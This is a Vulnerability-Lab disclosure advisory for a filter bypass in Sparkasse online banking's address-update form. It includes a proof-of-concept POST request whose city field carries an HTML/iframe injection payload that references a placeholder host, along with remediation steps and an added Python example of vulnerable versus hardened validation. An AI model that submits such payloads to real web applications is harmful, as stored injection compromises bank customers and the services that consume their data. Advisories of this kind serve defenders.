Document Title:
===============
Sparkasse Online Banking - Filter Bypass Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2264
Release Date:
=============
2021-10-17
Vulnerability Laboratory ID (VL-ID):
====================================
2264
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Filter or Protection Mechanism Bypass
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
The German Savings Banks Finance Group (Sparkassen-Finanzgruppe) is the most numerous sub-sector with 431 savings banks using
the Sparkasse brand, 8 Landesbanken including the DekaBank using separate brands and 10 real-estate financing banks using the
LBS brand. The Deutscher Sparkassen- und Giroverband (German Savings Banks and Clearing Association, DSGV) represents the
interests of the Sparkassen-Finanzgruppe on a national and international level concerning law and the financial services
industry. It also coordinates, promotes and harmonises the interests of Sparkassen.
(Copy of the Homepage: https://en.wikipedia.org/wiki/German_public_bank#Sparkassen )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a filter bypass web vulnerability in the Sparkasse Online Banking web-application (cms).
Affected Product(s):
====================
Sparkasse
Product: Online Banking (Web-Application) [CMS]
Vulnerability Disclosure Timeline:
==================================
2020-09-01: Researcher Notification & Coordination (Security Researcher)
2020-09-02: Vendor Notification (Security Department)
2020-09-04: Vendor Response/Feedback (Security Department)
2021-10-01: Vendor Fix/Patch by Check (Service Developer Team)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Sparkasse has added a new function to its online banking website for updating address data. The user is asked whether all
data from the registration process is still up to date. In the form itself it is possible to edit the location (Ort) and
other values. If a non-existing city is entered, the form instead asks, without secure parsing of the input, whether the
data should be accepted anyway.
Attackers can thus store their own payloads in the address data, which can lead directly to execution in the interfaces
that consume it. Normally, contents with special characters are blocked directly and never reach the database. Here the
profile information can be manipulated so that forms or applications which use the profile as an interface work with the
manipulated contract information. This allows vulnerabilities such as cross-site scripting or server-side request forgery
to be exploited to persistently manipulate the online banking application or linked services.
The validation class of the forms normally does not allow such content to be transferred; because the function is new,
the secure verification step was forgotten when it was integrated. Any transferred content that is later rendered as HTML,
for e-mails, automated printing/writing or delivery in combination with the address, can execute arbitrary code.
Remark: Normally invalid content or wrong input is encoded or escaped directly by the rudimentary Java class. In this case
the input is stored in the database, bypassing all validation mechanisms, and is then retrieved by third modules, where it
triggers individual manipulations with persistent attack vectors. This can be the manipulation of the address data of an
e-mail or of any content that is output by HTML / JavaScript functions.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Personendaten (Update)
Vulnerable Parameter(s):
[+] Ort
Affected Module(s):
[+] Hauptwohnsitz – (User Profile Data)
Proof of Concept (PoC):
=======================
The filter bypass vulnerability can be exploited by remote attackers with low user account privileges and without user interaction.
For a security demonstration or to reproduce the web vulnerability, follow the provided information and steps below.
--- Session Logs (Demo Sparkasse Kassel) ---
Referenz:
*-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html
-
https://www.kasseler-sparkasse.de/if/neo.proxy/pdm/neo/?services=pdm.anschriftpruefen
Host: www.kasseler-sparkasse.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
Content-Length: 1481
Origin: https://www.kasseler-sparkasse.de
Connection: keep-alive
Referer: https://www.kasseler-sparkasse.de/de/home/login-online-banking/personendaten-aktualisieren.html?n=true
Cookie: JSESSIONID=0000n1KJiK2E8f6NnCYAFQjLIyf:b3cb3f1c5; IF6CONTEXT=SVBTVEFOREFSRDo1MjA1MDM1MzpkZTpJRjpmYWxzZTprYXNzZWxlci1zcGs=;
IFCLONE=b3cb3f1c5; IF_SPKDE_CHECK=SPKDE_CHECK
{"clientRequestId":"27466cff-63fb-40df-b11e-f2510333c4c0","requests":[{"id":"0","service":"pdm.anschriftpruefen","data":{"F_99973$$"
:"Seitzemabacherweg","F_25022$$":"22","F_18080$$":"34251","F_14553$$":"Vellmar"><iframe src="evil.source">"},"ctx":{"F_83065$$":
"68806169016169797067"}}],"context":{"F_63959$$":{"F_83065$$":"68806169016169797067","F_42651$$":{"F_45023$$":
["5902-53-28-01.53.54.888000"],"F_61844$$":{"F_62705$$":"NEO_WF","F_68255$$":1597657015770,"F_1602$$":-1,"F_21926$$":
"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_54572$$":"I_PDM_WF_GPS_NEO_PDA_START","F_73309$$":"n02001.004.37326.1614237"},
"F_54716$$":{"F_47161$$":"XK7gNYm1OC1X","F_14066$$":"XWq8tyPCKYVgK1n7doCY6rBKm","F_43514$$":"vNXOzIQDnDoZNeC8eRhqkf3sE",
"F_27084$$":"joZoZk42gl7i","F_38158$$":"zweSauR0pgYs4A"}},"F_347$$":"pdm-1595467796239-5d07250f74054941bbf25facce8dc156",
"F_93388$$":[]},"F_11593$$":{"F_93585$$":"0-9a9ccedb-50bc-4c6e-86a8-4de36dd493f0","F_65941$$":"5498-50-13-01.50.03.293000",
"F_43610$$":"3978-47-02-08.47.12.843000","F_78819$$":"4190-03-05-12.19.17.405813","F_70165$$":"8958024679860394","F_2785$$":
"2FF81A0603AB17FC0001004","F_74914$$":"vR2428n","F_80587$$":"7M3GtAJNSl3","F_7860$$":"058","F_5646$$":"IKS02",
"F_96928$$":"7169-14-27-05.14.20.119000","F_45405$$":"W_PDM_GPS_NEO_PERSDAT_AKT_START","F_93384$$":"I_PDM_WF_GPS_NEO_PDA_START",
"F_58231$$":"A_PDM_NEO_PERSDAT_AKT_IF","F_12460$$":"W_PDM_NEO_PERSDAT_AKT_IF","F_79272$$":
"I_PDM_A_NEO_PERSDAT_AKT"},"F_53847$$":"g3Q3KmlA0J0GFEtqUi1oUUHS2dI8qh"}}
-
POST: HTTP/1.1 200 OK
Date: Mon, 17 Aug 2020 09:39:21 GMT
Server: Apache
X-UA-Compatible: IE=edge
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Cache-Control: no-store
Last-Modified: Mon, 17 Aug 2020 09:39:21 GMT
Content-Language: de-DE
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 942
Content-Type: application/json; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Remark: Normally invalid content or wrong input is encoded or escaped directly by the Java class. Here the input is stored
in the database past all validation mechanisms and is then used in third modules to cause individual manipulations with
persistent attack vectors. (Preview: 1.png, 2.png, 3.png)
Solution - Fix & Patch:
=======================
1. Restrict the input fields by limiting special characters.
2. Validate and securely encode the input before it is transmitted via the POST method.
3. Sanitize the content before output when displaying it in the different areas.
4. Alternatively, a web application firewall or filter mechanism can be implemented to prevent and identify further attacks of the same characteristics.
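The advisory's root cause is that the "accept this city anyway" branch of the address check stores the raw value while the normal branch goes through validation. The following Python example, added here and not code from the advisory or from Sparkasse's application, shows that defect side by side with a hardened handler that applies fixes 1 to 3 above: a character whitelist for the address fields, validation that runs before any branch decides whether to store, and HTML escaping at output time. The city/postal-code lookup table, the field names (ort, plz, accept_anyway) and the regex are constructed assumptions; the payload string is the one from the session log.

```python
import html
import re

# Constructed stand-in for the server-side postal-code/city lookup the form performs.
# (Assumption: the real lookup service is not known from the advisory.)
KNOWN_CITIES = {"34251": {"Vellmar"}, "34117": {"Kassel"}}

# Fix 1: whitelist for a German address line: letters incl. umlauts, digits,
# space, period, hyphen and slash, bounded length. Anything else is rejected.
ADDRESS_RE = re.compile(r"[A-Za-zÄÖÜäöüß0-9 .\-/]{1,60}")


class ValidationError(ValueError):
    """Raised when a submitted field contains characters outside the whitelist."""


def validate_field(name, value):
    # Fix 2: syntactic validation of the submitted value.
    if not ADDRESS_RE.fullmatch(value):
        raise ValidationError(f"{name}: contains disallowed characters")
    return value


def update_address_vulnerable(store, form):
    """Mirrors the flaw the advisory describes: only the known-city branch
    validates; the 'accept anyway' branch writes the raw value to the store."""
    city, plz = form["ort"], form["plz"]
    if city in KNOWN_CITIES.get(plz, set()):
        store["ort"] = validate_field("ort", city)   # validated path
        return "stored"
    if form.get("accept_anyway"):
        store["ort"] = city                           # BUG: validation skipped here
        return "stored-unverified"
    return "ask-confirmation"


def update_address_fixed(store, form):
    """Hardened handler: every field is validated before any branch runs, so the
    confirmation flag only decides whether a well-formed but unknown city is kept."""
    city = validate_field("ort", form["ort"])
    plz = validate_field("plz", form["plz"])
    if city in KNOWN_CITIES.get(plz, set()):
        store["ort"] = city
        return "stored"
    if form.get("accept_anyway"):
        store["ort"] = city                           # unknown city, but syntactically clean
        return "stored-unverified"
    return "ask-confirmation"


def render_address_html(store):
    """Fix 3: encode at output time for the HTML contexts the advisory names
    (e-mails, automated printing), so a stored payload cannot execute even if
    some other path let it into the database."""
    return f"<p>{html.escape(store.get('ort', ''))}</p>"


if __name__ == "__main__":
    payload = 'Vellmar"><iframe src="evil.source">'   # city value from the session log
    form = {"ort": payload, "plz": "34251", "accept_anyway": True}
    vulnerable_store = {}
    print(update_address_vulnerable(vulnerable_store, form), vulnerable_store)
    print(render_address_html(vulnerable_store))      # escaped, no <iframe> tag survives
    try:
        update_address_fixed({}, form)
    except ValidationError as exc:
        print("rejected:", exc)
```

The hardened handler keeps the confirmation dialogue the feature needs (an unknown but plausible city can still be accepted) while making the character restriction independent of which branch the request takes. Output encoding is retained as a second layer because, as the advisory notes, the stored value is consumed by several downstream modules that render it as HTML.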
Security Risk:
==============
The security risk of the filter bypass vulnerability in the Sparkasse online banking web application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the Vulnerability-Lab team and the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™